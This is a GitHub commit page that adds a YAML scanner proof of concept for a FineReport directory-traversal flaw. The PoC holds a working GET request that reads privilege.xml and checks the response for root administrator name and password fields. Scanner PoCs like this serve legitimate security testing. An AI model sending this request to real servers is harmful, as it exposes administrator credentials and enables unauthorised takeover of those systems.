Skip to content

Commit

Permalink
finereport-directory-traversal (#396)
Browse files Browse the repository at this point in the history
* finereport-directory-traversal
  • Loading branch information
l1nk3rlin authored and phith0n committed Sep 3, 2019
1 parent 7828b20 commit d111aee
Showing 1 changed file with 11 additions and 0 deletions.
11 changes: 11 additions & 0 deletions pocs/finereport-directory-traversal.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,11 @@
name: poc-yaml-finereport-directory-traversal
rules:
- method: GET
path: /report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
follow_redirects: false
expression: |
status == 200 && body.bcontains(b'<rootManagerName>') && body.bcontains(b'<rootManagerPassword>')
detail:
author: l1nk3r(http://www.lmxspace.com/)
links:
- http://foreversong.cn/archives/1378

0 comments on commit d111aee

Please sign in to comment.